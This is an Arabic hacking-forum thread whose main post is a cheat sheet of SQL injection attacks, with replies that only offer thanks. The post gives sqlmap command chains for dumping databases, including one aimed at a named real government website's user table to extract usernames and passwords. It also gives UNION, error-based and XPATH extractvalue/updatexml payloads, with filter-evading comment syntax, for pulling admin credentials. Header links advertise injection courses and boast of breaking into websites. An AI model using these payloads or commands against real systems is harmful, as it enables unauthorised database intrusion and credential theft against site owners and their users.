1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

أهم اوامر الحقن

الموضوع في 'المواضيع المُكرّرة والمُخالفة' بواسطة Injection, بتاريخ ‏2 ابريل 2014.

كاتب الموضوع : Injection المشاهدات : 1,518 الردود : 8 ‏2 ابريل 2014
حالة الموضوع:
مغلق
  1. غير متصل

    Injection
    rank
    Developer

    عضو منذ:
    ‏28 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الوظيفة:
    *******
    الإقامة:

    [​IMG]

    السلام عليكم ورحمة الله تعالى وبركاته

    اقدم لكم بعض الأوامر المهمه
    الآوامر

    1 - Sqlmap
    2 - Sqlmap post
    3 - union based
    4 - Error Based
    5 - XPATH extractvalue
    6 - XPATH UpdateXML


    [​IMG]
    نبدأ على بركة الله
    :

    1 - Sqlmap

    كود PHP:
    لاستخراج قواعد البيانات :

    python sqlmap.py -[TARGET] --dbs

    \\\\\\\///////

    لاستخراج الجداول من قاعدة بيانات :

    python sqlmap.py -[TARGET] -[DATABASE] --tables

    \\\\\\\///////

    لاستخراج الاعمدة من الجدول :

    python sqlmap.py -[TARGET] -[DATABASE] -[TABLE] --columns

    \\\\\\\///////

    لاستخراج البيانات من الاعمدة :

    python sqlmap.py -[TARGET] -[DATABASE] -[TABLE] -[Col1,Col2,Col3] --dump
    [​IMG]

    2 - Sqlmap post

    كود PHP:
    sqlmap.py -"http://www.nlm.gov.mm/index.php?optio" --data="name=cloudx&email=cloudx&Submit=*Submit&option=com_ccnewsletter&task=addS*ubscriber" -p email --dbs
    ---------------------
    sqlmap.py -"http://www.nlm.gov.mm/index.php?optio" --data="name=cloudx&email=cloudx&Submit=*Submit&option=com_ccnewsletter&task=addS*ubscriber" -p email -D 713893_justnation --tables
    ---------------------
    sqlmap.py -"http://www.nlm.gov.mm/index.php?optio" --data="name=cloudx&email=cloudx&Submit=*Submit&option=com_ccnewsletter&task=addS*ubscriber" -p email -D 713893_justnation -T jos_users --columns
    ---------------------
    sqlmap.py -"http://www.nlm.gov.mm/index.php?optio" --data="name=cloudx&email=cloudx&Submit=*Submit&option=com_ccnewsletter&task=addS*ubscriber" -p email -D 713893_justnation -T jos_users -C username,password --dump
    [​IMG]

    3 - union based

    كود PHP:
    استخراج عدد الاعمدة :

    +
    /*!order+by*/+NUMBER--

    استخراج العمود المصاب :

    /**/union/*!50000select*/+NUM,NUM,NUM--

    استخراج اصدار القاعدة :

    /**/union/*!50000select*/+1,/*!version()*/,3,4,5,6,7,8--

    اصدار اسم القاعدة :

    /**/union/*!50000select*/ 1,/*!database()*/,3,4,5,6,7,8--

    استخراج الجداول :

    group_concat(table_name)

    +
    from+information_schema.tables+where+table_schema=database()--

    استخراج الاعمدة :

    group_concat(column_name)

    +
    from+information_schema.columns+where+table_name=0xTABLE_HEX

    تشفير الجدول بالهيكس 
    http://www.waraxe.us/sql-char-encoder.html

    استخراج البيانات :

    +
    group_concat(COLUMNS)

    +
    from+TABLE_NAME
    [​IMG]

    4 - Error Based

    كود PHP:
    اصدار القاعدة :

    or 
    1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--


    ============

    قاعدة البيانات :

    and (
    select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    ===========

    استخراج الجداول :

    and (
    select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    نقوم بالتلاعب بـ limit للوصول الى الجدول المطلوب
    ===========

    استخراج الاعمدة :

    and (
    select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLENAMEHERE limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    ملاحظة ضروري تشفير الجداول بالهيكس :

    http://www.waraxe.us/sql-char-encoder.html

    نتلاعب بالـ limit للوصول الى الاعمدة المطلوبة
    ==========

    استخراج البيانات :

    and (
    select 1 from (select count(*),concat((select(select concat(cast(concat(admin_NAME,0x7e,admin_PWD) as char),0x7e)) from Ignotus_1.tbl_userADMINS limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    نتلاعب بـ limit للوصول الى كافة البيانات

    Ignotus_1
    .tbl_userADMINS

    مكان Ignotus_1 
    نضع اسم قاعدة البيانات
    مكان tbl_userADMINS 
    نضع اسم الجدول

    [​IMG]

    5 -XPATH extractvalue

    كود PHP:
    اصدار القاعدة :

    +and+
    extractvalue(rand(),concat(0x7e,version()))--

    -----------------------
    قاعدة البيانات :

    +and+
    extractvalue(rand(),concat(0x7e,database()))--

    -----------------------

    الجداول :

    +and+
    extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))--

    -----------------------

    الاعمدة :

    +and+
    extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=TABLE_HEX+limit+0,1)))--  

    *
    تشفير الجدول بالهيكس

    http
    ://www.waraxe.us/sql-char-encoder.html

    -----------------------

    البيانات :

    +and+
    extractvalue(rand(),concat(0x7e,(select+concat(name,0x7e,password)+from+administrator_account+limit+0,1)))--
    [​IMG]

    6 - XPATH UpdateXML

    كود PHP:
    استخراج اصدار قاعدة البيانات :

    +and+
    updatexml(0x7e,concat(0x7e,(version())),0)--

    ------------------------

    استخراج قاعدة البيانات :

    +and+
    updatexml(0x7e,concat(0x7e,(database())),0)--

    ------------------------

    استخراج الجداول :

    +and+
    updatexml(0x7e,concat(0x7e,((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1))),0)--  

    نتلاعب بالـ limit للوصول الى الجدول المطلوب !

    ------------------------

    استخراج الاعمدة :

    +and+
    updatexml(0x7e,concat(0x7e,((select+concat(column_name)+from+information_schema.columns+where+table_name=TABLE_HEX+limit+0,1))),0)--  

    تشفير الجدول بالهيكس

    http
    ://www.waraxe.us/sql-char-encoder.html

    نتلاعب بالـ limit للوصول للاعمدة المطلوبة !

    -----------------------

    استخراج البيانات :

    +and+
    updatexml(0x7e,concat(0x7e,((select+concat(column,0x7e,column)+from+table+limit+0,1))),0)--

    [​IMG]

    بالتوفيق لكم اخواني :{y.}
     


    جاري تحميل الصفحة...
  2. غير متصل

    Đѓ.Đ4řķ
    rank
    Developer

    عضو منذ:
    ‏17 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: أهم اوامر الحقن

    بارك الله فيك وجزاك خير الجزاء
     


  3. غير متصل

    нάсќɇя
    rankrank
    Developer

    عضو منذ:
    ‏17 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: أهم اوامر الحقن

    شكرا لك ياغالي بارك الله فيك​
     


  4. غير متصل

    كراش المحارب
    DeveloPer Plus

    عضو منذ:
    ‏26 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: أهم اوامر الحقن

    تسلم أيدك يا بطل &:"
     


  5. غير متصل

    El Mejor
    rankrank
    Developer

    عضو منذ:
    ‏26 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الوظيفة:
    Hacker
    الإقامة:

    رد: أهم اوامر الحقن

    بطل الله يعطيك العافيه​
     


  6. غير متصل

    jőŐőķєя
    rankrank
    Developer

    عضو منذ:
    ‏9 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    طآلب , ثآنوي ..●
    الإقامة:

    رد: أهم اوامر الحقن

    سلمت يداك على الطرح الراقي أخي

    ودي وإحترامي لك :{8}:​
     


  7. غير متصل

    D 1 r k
    DeveloPer Plus

    عضو منذ:
    ‏9 ابريل 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    الوظيفة:
    Currently Student
    الإقامة:

    رد: أهم اوامر الحقن

    بطل حبيبي واصل تفوقك :ُok:ٌ
     


  8. غير متصل

    ★ قبعة القش ★
    V • I • P

    عضو منذ:
    ‏10 مايو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:

    رد: أهم اوامر الحقن

    شرح جميل و معلومات قيمة تسلم إيدك )5:")5:")5:"

    تسلم إيدك حبيبي )5:")5:":{7}::{7}:
     


  9. غير متصل

    صدام السقاف
    ExpErt DeveloPer

    عضو منذ:
    ‏11 يونيو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:

    رد: أهم اوامر الحقن

    بارك الله فيك اخى الكريم فعلاً اوامر وشرح وافي وكافي ماقصرت اخى الكريم
     


الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...